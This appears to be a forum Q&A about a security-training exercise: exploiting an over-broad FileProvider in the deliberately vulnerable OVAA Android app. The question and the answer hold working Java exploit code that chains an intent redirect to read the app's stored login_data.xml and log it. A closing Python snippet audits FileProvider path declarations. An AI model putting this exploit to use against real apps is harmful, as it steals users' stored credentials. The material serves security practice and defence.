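How to solve an Android Content Provider data leak with an implicit intent
There is a vulnerable application for practicing Android security. Link Here. I am stuck on its 16th task.
16. Use of a very wide file-sharing declaration for the oversecured.ovaa.fileprovider content provider in the root entry.
MainActivity.java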
public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Intent extra = new Intent(Intent.ACTION_VIEW);
        extra.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
        extra.setClassName(getPackageName(), "com.exploit.app.LeakActivity");
        extra.setType("text/xml");
        extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"));
        Intent intent = new Intent();
        intent.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
        intent.putExtra("redirect_intent", extra);
        startActivity(intent);
    }
}
LeakActivity.java
public class LeakActivity extends MainActivity {
    InputStream i = getContentResolver().openInputStream(getIntent().getData());

    public LeakActivity() throws FileNotFoundException {
    }
}
AndroidManifest.xml
<activity android:name=".MainActivity">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>
<activity android:name=".LeakActivity" />
Thanks
Solution
I have verified that the code provided below works for me:
MainActivity.java
public class MainActivity extends AppCompatActivity {
    private Button button;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        button = (Button) findViewById(R.id.button);
        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Intent extra = new Intent();
                extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
                        | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION
                        | Intent.FLAG_GRANT_READ_URI_PERMISSION
                        | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
                extra.setClassName(getPackageName(), "com.example.fileleaker.Leaker");
                extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/"));
                Intent intent = new Intent();
                intent.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
                intent.putExtra("redirect_intent", extra);
                startActivity(intent);
            }
        });
    }
}
Leaker.java
public class Leaker extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_leaker);
        // Append the file path to the provider prefix URI received in the intent
        Uri uri = Uri.parse(getIntent().getDataString() + "root/data/data/oversecured.ovaa/shared_prefs/login_data.xml");
        try {
            // Stream over the file served by the provider
            InputStream i = getContentResolver().openInputStream(uri);
            // Creating an InputStreamReader object
            InputStreamReader isReader = new InputStreamReader(i);
            // Creating a BufferedReader object
            BufferedReader reader = new BufferedReader(isReader);
            StringBuffer sb = new StringBuffer();
            String str;
            // Log the file line by line
            while ((str = reader.readLine()) != null) {
                Log.v("Hello", "=======File__DATA=======" + str + "==========");
            }
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
AndroidManifest.xml
<activity android:name=".Leaker">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
    </intent-filter>
</activity>
<activity android:name=".MainActivity">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>
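
For the defensive side of task 16, the following added example (not part of the original question or answer, and not code from the OVAA project) audits a FileProvider `<paths>` resource for over-broad entries and shows which file a `content://` URI resolves to under a given declaration. Both XML snippets are constructed samples: `WEAK` is shaped like the "root" entry the task describes, `HARDENED` uses a hypothetical `shared/` subdirectory, and the base-directory table is a simplified model covering internal-storage tags only.

```python
import posixpath
import xml.etree.ElementTree as ET
from urllib.parse import urlparse, unquote

PKG = "oversecured.ovaa"  # package name as it appears in the page's URIs

# Base directory each FileProvider path tag is resolved against (simplified model).
BASES = {
    "root-path": "/",
    "files-path": f"/data/data/{PKG}/files",
    "cache-path": f"/data/data/{PKG}/cache",
}

# Constructed sample: a declaration shaped like the "root" entry the task describes.
WEAK = '<paths><root-path name="root" path=""/></paths>'
# Constructed sample: only one dedicated subdirectory of files/ is shareable.
HARDENED = '<paths><files-path name="shared" path="shared/"/></paths>'


def load_roots(paths_xml):
    """Return {name: absolute directory} for every entry in a <paths> resource."""
    roots = {}
    for el in ET.fromstring(paths_xml):
        if el.tag in BASES:
            roots[el.get("name")] = posixpath.normpath(
                posixpath.join(BASES[el.tag], el.get("path", "")))
    return roots


def audit(paths_xml):
    """Flag entries that expose the filesystem root or a whole app directory."""
    broad = set(BASES.values())
    return [f"{name} -> {d}" for name, d in load_roots(paths_xml).items() if d in broad]


def resolve(paths_xml, content_uri):
    """Map a content:// URI to the file it would serve, or None if not covered."""
    segments = unquote(urlparse(content_uri).path).lstrip("/").split("/", 1)
    if len(segments) != 2:
        return None
    name, rel = segments
    root = load_roots(paths_xml).get(name)
    if root is None:
        return None
    target = posixpath.normpath(posixpath.join(root, rel))
    # Reject results that fall outside the declared directory.
    inside = target.startswith(root.rstrip("/") + "/")
    return target if inside else None
```

With the `WEAK` declaration, the URI from the question resolves to the app's `shared_prefs/login_data.xml`; with `HARDENED`, the same URI is not covered by any entry and resolves to nothing.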